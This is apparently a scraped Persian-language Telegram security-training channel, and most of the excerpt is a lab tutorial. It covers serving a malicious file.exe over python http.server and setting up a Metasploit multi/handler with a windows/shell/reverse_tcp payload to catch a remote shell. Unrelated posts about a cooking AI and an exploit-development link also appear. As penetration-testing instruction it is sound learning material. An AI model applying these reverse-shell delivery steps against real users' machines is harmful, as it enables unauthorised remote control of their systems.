Try Hack Box – Telegram
Try Hack Box
5.77K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
مرحله 2: فایل را از لینوکس Serve کنید

یک وب سرور لینوکس را پیکربندی کنید تا محتویات دایرکتوری /tmp شما (شامل fiie.exe) را ارائه دهد.

حالا cdرا وارد دایرکتوری کنید که می خواهید محتوای آن از طریق HTTP ارائه شود. سپس مفسر پایتون را اجرا کنید تا ماژولی به نام http,server , listening on TCP 8000 port 8000 (پیش‌فرض) فراخوانی شود:

$ cd /tmp/
/tmp$ python -m http.server

با اجرای http.server در یک پنجره، اکنون به مرحله 3 می رویم و msfconsole Metasploit را فراخوانی و پیکربندی می کنیم.
#Metasploit
@TryHackBox
👍1
مرحله 3: msfconsole را پیکربندی کنید

یک پنجره ترمینال دیگر را باز کنید! در این پنجره ترمینال دوم (جدا از شما
دستور http.server)، برنامه msfconsole را فراخوانی کنید.

msfconsole

در اعلان msf، دستورات را به صورت تعاملی به متاسپلویت صادر کنید. به آن بگویید تمام ماژول های اکسپلویت را که در دسترس است نشان دهد.
#Metasploit
@TryHackBox
متاسپلویت دارای بیش از 2000 اکسپلویت مختلف برای انواع نقص های نرم افزاری مختلف است.

ما از expioit/muiti/handier استفاده می کنیم که به اختصار multi/handler نیز شناخته می شود. دستور info در msfconsole می‌تواند در هر زمان برای کسب اطلاعات بیشتر در مورد هزاران ماژول در متاسپلویت، از جمله اکسپلویت‌ها، پیلودها، ماژول‌های کمکی و غیره استفاده شود. خروجی خلاصه‌ای مفید از استفاده از ماژول، متغیرهای آن، و گزینه های دیگر برای پیکربندی آن

از دستور info برای دریافت اطلاعات بیشتر در مورد multi/handler استفاده کنید.
👍1
Try Hack Box pinned Deleted message
برای multi/handler، به توضیحات توجه کنید: "این ماژول یک stub است که تمام فیچر های متاسپلویت پیلود سیستم را برای اکسپلویت هایی که خارج از چارچوب راه اندازی شده اند، ارائه می دهد". پس از پیکربندی multi/handler، ما از یک کاربر خواهیم داشت که فایل مخرب ما را با استفاده از یک مرورگر دانلود کرده و آن را به صورت دستی اجرا می کند (بنابراین آن را خارج از چارچوب راه اندازی می کند). برنامه file.exe دوباره به multi/handler متصل می شود، جایی که ما آن را کنترل می کنیم.

ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم.

از دستور use برای انتخاب multi/handler استفاده کنید.
msf5 > use exploit/multi/handler

درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما می‌گوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون می‌توانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم:

msf5 exploit(multi/handler) > show payloads


اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد.

از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید.

msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
وقتی file.exe را ساختیم، به msfvenom گفتیم که یک فایل EXE مخرب با استفاده از همین پیلود (windows/shell/reveise_tcp) بسازد. جالب است بدانید که اگر فایل مخربی مانند file.exe را با پیلودی متفاوت از پیلودی که با استفاده از multi/handler در msfconsole ارسال می کنیم پیکربندی کنیم، پیلود ارسال شده توسط multi/handler اولویت دارد! فایل مخرب ایجاد شده توسط متاسپلویت (مانند file.exe) یک پیلود متفاوت از مولتی/هندلر دریافت می‌کند که با آن پیلود متفاوت ساخته شده است و اجرا می‌کند، و هر یک از قابلیت‌های payload خودش را نادیده می‌گیرد. با این حال، برای این آزمایشگاه، از همان payload در multi/handler استفاده خواهیم کرد که در file.exe با msfvenom استفاده کردیم. بیشتر پنتسترها از یک پیلود استفاده می کنند، بنابراین این همان کاری است که ما در اینجا انجام خواهیم داد.

پس از انتخاب یک پیلود، به تمام گزینه‌هایی که می‌توانید با اجرای گزینه‌های show options کنید، نگاه کنید.
#metasploit
@TryHackBox
دستور show options برخی از گزینه‌های مهم مانند LHOST و LPORT را نشان می‌دهد (آدرس IP و شماره پورتی که پیلود تحویل داده شده به آن متصل می‌شود).

LHOST
را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، می‌توانیم LHOST را که در file.exe ساخته‌ایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو می‌شود. اما ما از همان آدرس آدرس خود استفاده می‌کنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم.

LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با show options تأیید کنید.

در شکل زیر خواهید دید
👍2👎1
👍2👎1
دوستان اگر مهارتی در برنامه نویسی هر زبانی و حوزه های امنیت دارید یا حتی یک دوره رو خوب بلد هستید و نسبتا متوسط و مایل هستید اون دانش برای دیگر دوستان آموزش بدید و برای خودتون مرور بشه میتونید در کانال ما شروع به تولید محتوا کنید .

آیدی جهت ارتباط :
@Thb_Support

یا
@Unique_exploitbot
👍2
Try Hack Box
Photo
برای فعال کردن multi/handler، لطفا دستور زیر را اجرا کنید:

msf5 exploit(multi/handler) > exploit
وقتی اکسپلویت را به خودی خود اجرا می کنید، اعلان msfconsole شما را متصل می کند. برای انعطاف‌پذیری بیشتر، می‌خواهیم msfconsole را برگردانیم و multi/handler را در پس‌زمینه اجرا کنیم. برای انجام این کار، CTRL-C را فشار دهید تا مولتی/هندلر متوقف شود:
اکنون دستور exploit را با گزینه -j اجرا کنید تا اجرای exploit "jobify" باشد:
msf5 exploit(multi/handler) > exploit -j
اکنون باید نشانه‌ای ببینید که مولتی/هندلر در پس‌زمینه گوش می‌دهد و از msfconsole شما خواسته می‌شود.

در هر زمان، می‌توانید با اجرای زیر فهرستی از کارهای پس‌زمینه را از msfconsole دریافت کنید:
msf5 exploit(multi/handler) > jobs
خروجی شما باید به شکل زیر باشد:
👍2
ChefGPT
یک شبکه عصبی است که به شما در پختن غذا کمک می کند.

هر چه ورودی بیشتر باشد، بهتر است! برای استفاده موفقیت آمیز از هوش مصنوعی، به شما پیشنهاد می شود:

1. فهرستی از مواد موجود را وارد کنید.
2. آنچه در آشپزخانه دارید (فر، مخلوط کن، توستر و غیره) را مشخص کنید.
3. مشخص کنید که چقدر زمان دارید.
4. سطح مهارت های خود را در آشپزی نشان دهید.
5. حالت "Gourmet" یا "ALL" را انتخاب کنید، i.e. از مواد به طور جداگانه یا با هم استفاده کنید.

ما مزیت های شبکه های عصبی را می چشیم.

برای آشپزهای کانال :)
#سرویس #هوش_مصنوعی
@TryHackBox
👍4🔥1
wifi driver linux exploit dev firstone for fun and profit

http://vrgl.ir/5IRUi

#توسعه_اکسپلویت
#exploit #exploitation
@TryHackBox